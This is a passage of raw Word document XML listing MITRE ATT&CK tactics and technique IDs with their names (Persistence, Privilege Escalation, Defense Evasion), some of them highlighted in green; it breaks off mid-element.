      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502DB219"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1098.005', 'T1098.003', 'T1136.003', 'T1078.004', 'T1078.003', 'T1505.003', 'T1098.001', 'T1098.002', 'T1078', 'T1133', 'T1078.002', 'T1547.009', 'T1546.003', 'T1547.001', 'T1546.008', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416438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T1098.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Manipulation&gt;:Device Registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529285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T1098.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Manipulation&gt;:Additional Cloud Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FEA34B"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T1136.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create Account&gt;:Cloud Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB6BD5"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4A05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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB750B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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A15287"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T1098.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Manipulation&gt;:Additional Cloud Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7E627"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T1098.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Manipulation&gt;:Additional Email Delegate Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375293A"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB85B7"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550589A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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FCDF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T1547.009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Shortcut Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E9E2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1546.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Windows Management Instrumentation Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D63B4D" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="009F42AF" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ADB97C"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1B2F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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AD324"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1068', 'T1078.004', 'T1078.003', 'T1484.002', 'T1078', 'T1078.002', 'T1547.009', 'T1546.003', 'T1548.002', 'T1547.001', 'T1546.008', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2F52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1068 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2BFF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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A490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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F9E0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T1484.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Domain Policy Modification&gt;:Domain Trust Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D62C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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B727095"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056089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T1547.009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Shortcut Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94DB2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T1546.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Windows Management Instrumentation Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA94874"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D74B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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782692B"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109594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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3F880"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 xml:space="preserve">Next tactic is TA0005 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1027.006', 'T1553.005', 'T1218.005', 'T1550.001', 'T1078.004', 'T1078.003', 'T1027.001', 'T1036.004', 'T1036.005', 'T1036', 'T1553.002', 'T1070', 'T1550', 'T1484.002', 'T1078', 'T1550.004', 'T1140', 'T1562.001', 'T1562.004', 'T1562.002', 'T1070.006', 'T1078.002', 'T1027', 'T1218.011', 'T1548.002', 'T1027.002', 'T1550.003', 'T1070.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951274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T1027.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:HTML Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DCF3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T1553.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Mark-of-the-Web Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4A40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T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3474F82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T1550.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660F40C"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507F17D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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2AF1B"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T1027.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Binary Padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C47F64"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T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57FE5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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C50F5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1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB791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DF3093">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF3093">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E914F6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1070 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Indicator Removal on Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1144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1550 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Alternate Authentication Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79933E5B"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T1484.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Domain Policy Modification&gt;:Domain Trust Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC182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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C85E9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T1550.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Web Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0FA4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r w:rsidRPr="00AA5C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA5C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA5C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE5D9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T1562.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
